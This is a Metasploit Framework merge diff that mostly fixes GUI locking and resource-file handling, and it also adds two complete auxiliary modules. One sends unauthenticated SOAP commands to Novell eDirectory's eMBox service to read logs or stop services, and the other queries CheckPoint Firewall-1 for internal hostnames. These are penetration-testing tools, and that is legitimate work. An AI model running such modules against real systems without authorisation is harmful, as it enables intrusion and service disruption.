Merge remote branch 'upstream/master'
commit
df0abd0273
Binary file not shown.
|
@ -265,6 +265,7 @@ public class DbConnectDialog extends OptionsDialog {
|
|||
token = s.next();
|
||||
}
|
||||
} catch (FileNotFoundException fnfox){
|
||||
fnfox.printStackTrace();
|
||||
}
|
||||
showDefaults();
|
||||
}
|
||||
|
|
|
@ -265,6 +265,7 @@ public class MainFrame extends FrameView {
|
|||
}
|
||||
publish((Object)jobStrings);
|
||||
} catch (MsfException msfEx) {
|
||||
if(!MsfguiApp.shuttingDown || !msfEx.getMessage().contains("Connection refused"))
|
||||
msfEx.printStackTrace();
|
||||
publish("Error getting session list "+msfEx);
|
||||
if(!msfEx.getMessage().contains("timed out")) // on timeout, just retry
|
||||
|
@ -1655,6 +1656,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
|
|||
});
|
||||
jobsList.addMouseListener( new PopupMouseListener() {
|
||||
public void mouseReleased(MouseEvent e){
|
||||
super.mouseReleased(e);
|
||||
int indx = jobsList.locationToIndex(e.getPoint());
|
||||
if (indx == -1)
|
||||
return;
|
||||
|
|
|
@ -3,8 +3,6 @@ package msfgui;
|
|||
import java.awt.Component;
|
||||
import java.awt.event.ActionEvent;
|
||||
import java.awt.event.ActionListener;
|
||||
import java.awt.event.FocusEvent;
|
||||
import java.awt.event.FocusListener;
|
||||
import java.awt.event.MouseEvent;
|
||||
import java.io.File;
|
||||
import java.io.IOException;
|
||||
|
@ -199,7 +197,6 @@ public class MeterpFileBrowser extends MsfFrame {
|
|||
/** Retrieves list of files. */
|
||||
private void getFiles() {
|
||||
//Set up locking so the console doesn't eat our output
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
|
||||
while(model.getRowCount() > 0)
|
||||
|
@ -243,10 +240,8 @@ public class MeterpFileBrowser extends MsfFrame {
|
|||
for(int i = 0; i < mainTable.getColumnCount(); i++)
|
||||
if(mainTable.getColumnName(i).equals("Name"))
|
||||
nameColumn = i;
|
||||
if(nameColumn != -1){
|
||||
if(nameColumn != -1)
|
||||
mainTable.moveColumn(nameColumn, 0);
|
||||
stop();
|
||||
}
|
||||
} catch (Exception ex) {
|
||||
ex.printStackTrace();
|
||||
if(ex.getMessage().toLowerCase().contains("unknown session"))
|
||||
|
|
|
@ -103,7 +103,6 @@ public class OpenConnectionDialog extends javax.swing.JDialog {
|
|||
String host = info.get("host").toString();
|
||||
int port = Integer.parseInt(info.get("port").toString());
|
||||
boolean ssl = Boolean.parseBoolean(info.get("ssl").toString());
|
||||
String type = info.get("type").toString();
|
||||
RpcConnection rpc = RpcConnection.getConn(username, password.toCharArray(), host, port, ssl);
|
||||
if(javax.swing.JOptionPane.showConfirmDialog(null, "Connect to last remembered rpcd?") == javax.swing.JOptionPane.YES_OPTION)
|
||||
return rpc;
|
||||
|
|
|
@ -57,16 +57,6 @@ public class ProcessList extends MsfFrame {
|
|||
this.rpcConn = rpcConn;
|
||||
this.session = session;
|
||||
this.lock = (ReentrantLock)sessionPopupMap.get(session.get("id")+"lock");
|
||||
((DraggableTabbedPane)tabbedPane).setTabFocusListener(0, new FocusListener() {
|
||||
public void focusGained(FocusEvent e) {
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
}
|
||||
public void focusLost(FocusEvent e) {
|
||||
while(lock.getHoldCount() > 0)
|
||||
lock.unlock();
|
||||
}
|
||||
});
|
||||
//See if we need to move our tab
|
||||
Map props = MsfguiApp.getPropertiesNode();
|
||||
if(!props.get("tabWindowPreference").equals("window")){
|
||||
|
@ -74,13 +64,12 @@ public class ProcessList extends MsfFrame {
|
|||
(Component)sessionPopupMap.get(session.get("id")+"console")));
|
||||
DraggableTabbedPane.show(mainPanel);
|
||||
}
|
||||
if(!lock.tryLock())
|
||||
lock.lock();
|
||||
listProcs();
|
||||
}
|
||||
|
||||
/** Lists the processes that are running */
|
||||
protected void listProcs() throws HeadlessException {
|
||||
lock.lock();
|
||||
if (runCommand("ps"))
|
||||
return;
|
||||
readTimer = new Timer(300, new ActionListener() {
|
||||
|
@ -113,6 +102,7 @@ public class ProcessList extends MsfFrame {
|
|||
readTimer.stop();
|
||||
MsfguiApp.showMessage(null, ex.getMessage());
|
||||
}
|
||||
lock.unlock();
|
||||
}
|
||||
});
|
||||
readTimer.start();
|
||||
|
|
|
@ -185,19 +185,61 @@ class Core
|
|||
cmd_resource_help
|
||||
return false
|
||||
end
|
||||
|
||||
args.each do |res|
|
||||
if not File.file? res
|
||||
good_res = nil
|
||||
if (File.file? res and File.readable? res)
|
||||
good_res = res
|
||||
elsif
|
||||
# let's check to see if it's in the scripts/resource dir (like when tab completed)
|
||||
[
|
||||
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
||||
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
|
||||
].each do |dir|
|
||||
res_path = dir + File::SEPARATOR + res
|
||||
if (File.file?(res_path) and File.readable?(res_path))
|
||||
good_res = res_path
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
if good_res
|
||||
driver.load_resource(good_res)
|
||||
else
|
||||
print_error("#{res} is not a valid resource file")
|
||||
next
|
||||
end
|
||||
driver.load_resource(res)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Tab completion for the resource command
|
||||
#
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
tabs = []
|
||||
#return tabs if words.length > 1
|
||||
if ( str and str =~ /^#{Regexp.escape(File::SEPARATOR)}/ )
|
||||
# then you are probably specifying a full path so let's just use normal file completion
|
||||
return tab_complete_filenames(str,words)
|
||||
elsif (not words[1] or not words[1].match(/^\//))
|
||||
# then let's start tab completion in the scripts/resource directories
|
||||
begin
|
||||
[
|
||||
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
||||
::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
|
||||
].each do |dir|
|
||||
next if not ::File.exist? dir
|
||||
tabs += ::Dir.new(dir).find_all { |e|
|
||||
path = dir + File::SEPARATOR + e
|
||||
::File.file?(path) and File.readable?(path)
|
||||
}
|
||||
end
|
||||
rescue Exception
|
||||
end
|
||||
else
|
||||
tabs += tab_complete_filenames(str,words)
|
||||
end
|
||||
return tabs
|
||||
end
|
||||
|
||||
def cmd_makerc_help
|
||||
|
@ -902,7 +944,7 @@ class Core
|
|||
if (path !~ /#{File::SEPARATOR}/)
|
||||
plugin_file_name = path
|
||||
|
||||
# If the plugin isn't in the user direcotry (~/.msf3/plugins/), use the base
|
||||
# If the plugin isn't in the user directory (~/.msf3/plugins/), use the base
|
||||
path = Msf::Config.user_plugin_directory + File::SEPARATOR + plugin_file_name
|
||||
if not File.exists?( path + ".rb" )
|
||||
# If the following "path" doesn't exist it will be caught when we attempt to load
|
||||
|
@ -2132,7 +2174,7 @@ class Core
|
|||
# Returns the revision of the framework and console library
|
||||
#
|
||||
def cmd_version(*args)
|
||||
ver = "$Revision$"
|
||||
ver = "$Revision: 14065 $"
|
||||
|
||||
print_line("Framework: #{Msf::Framework::Version}.#{Msf::Framework::Revision.match(/ (.+?) \$/)[1]}")
|
||||
print_line("Console : #{Msf::Framework::Version}.#{ver.match(/ (.+?) \$/)[1]}")
|
||||
|
|
|
@ -0,0 +1,156 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
|
||||
'Description' => %q{
|
||||
This module will access Novell eDirectory's eMBox service and can run the
|
||||
following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
|
||||
STOP_SERVICE, START_SERVICE, SET_LOGFILE.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-0926' ],
|
||||
[ 'BID', '28441' ],
|
||||
[ 'OSVDB', '43690' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Nicob',
|
||||
'MC', #Initial Metasploit module
|
||||
'sinn3r'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
[
|
||||
'GET_DN',
|
||||
{
|
||||
'Description' => 'Get DN',
|
||||
'CMD' => 'novell.embox.connmgr.serverinfo',
|
||||
'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'READ_LOGS',
|
||||
{
|
||||
'Description' => 'Read all the log files',
|
||||
'CMD' => 'logger.readlog',
|
||||
'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'LIST_SERVICES',
|
||||
{
|
||||
'Description' => 'List services',
|
||||
'CMD' => 'novell.embox.service.getServiceList',
|
||||
'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
|
||||
'USE_PARAM' => false
|
||||
}
|
||||
],
|
||||
[
|
||||
'STOP_SERVICE',
|
||||
{
|
||||
'Description' => 'Stop a service',
|
||||
'CMD' => 'novell.embox.service.stopService',
|
||||
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
|
||||
'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
|
||||
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
|
||||
'</params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
],
|
||||
[
|
||||
'START_SERVICE',
|
||||
{
|
||||
'Description' => 'Start a service',
|
||||
'CMD' => 'novell.embox.service.startService',
|
||||
'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
|
||||
'PARAM' => '<Parameters>' +
|
||||
'<params xmlns:DSService="service.dtd">' +
|
||||
'<DSService:moduleName>__PARAM__</DSService:moduleName>'+
|
||||
'</params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
],
|
||||
[
|
||||
'SET_LOGFILE',
|
||||
{
|
||||
'Description' => 'Read Log File',
|
||||
'CMD' => 'logger.setloginfo',
|
||||
'PATTERN' => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
|
||||
'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>'+
|
||||
'<logOptionAppend/></params></Parameters>',
|
||||
'USE_PARAM' => true
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'LIST_SERVICES'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8028),
|
||||
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
if action.opts['USE_PARAM']
|
||||
if datastore['PARAM'].nil? or datastore['PARAM'].empty?
|
||||
print_error("You must supply a parameter for action: #{action.name}")
|
||||
return
|
||||
else
|
||||
param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
|
||||
end
|
||||
else
|
||||
param = '<Parameters><params/></Parameters>'
|
||||
end
|
||||
|
||||
template = %Q|<?xml version="1.0"?>
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Header/>
|
||||
<SOAP-ENV:Body>
|
||||
<dispatch>
|
||||
<Action>#{action.opts['CMD']}</Action>
|
||||
<Object/>#{param}</dispatch>
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>|
|
||||
|
||||
template = template.gsub(/^\t\t/, '')
|
||||
template = template.gsub(/\n/, '')
|
||||
|
||||
connect
|
||||
print_status("Sending command: #{action.name}...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/SOAP',
|
||||
'data' => template + "\n\n",
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Type' => 'text/xml',
|
||||
'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
|
||||
}
|
||||
}, 25)
|
||||
|
||||
raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
|
||||
print_line("\n" + Rex::Text.decode_base64(raw_data))
|
||||
|
||||
disconnect
|
||||
end
|
||||
end
|
|
@ -0,0 +1,69 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
|
||||
'Description' => %q{
|
||||
This module sends a query to the TCP port 264 on CheckPoint
|
||||
firewalls to obtain the firewall name and management station
|
||||
(such as SmartCenter) name.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
|
||||
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(264),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Attempting to contact Checkpoint FW1 Topology service...")
|
||||
connect
|
||||
|
||||
sock.put("\x51\x00\x00\x00")
|
||||
sock.put("\x00\x00\x00\x21")
|
||||
res = sock.get(4)
|
||||
if (res == "Y\x00\x00\x00")
|
||||
print_good("Appears to be a CheckPoint Firewall...")
|
||||
sock.put("\x00\x00\x00\x0bsecuremote\x00")
|
||||
res = sock.get_once
|
||||
if (res =~ /CN\=(.+),O\=(.+)\./i)
|
||||
print_good("Firewall Host: #{$1}")
|
||||
print_good("SmartCenter Host: #{$2}")
|
||||
end
|
||||
else
|
||||
print_error("Unexpected response:\r\n#{res}")
|
||||
end
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77556'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18213/' ],
|
||||
[ 'URL', 'http://traqproject.org/' ],
|
||||
],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77387'],
|
||||
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]
|
||||
|
|
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
|
|||
if not ::File.exists?(datastore['RESOURCE'])
|
||||
raise "Resource File does not exists!"
|
||||
else
|
||||
::File.open(datastore['RESOURCE'], "br").each_line do |cmd|
|
||||
::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
|
||||
next if cmd.strip.length < 1
|
||||
next if cmd[0,1] == "#"
|
||||
begin
|
||||
|
|
Loading…
Reference in New Issue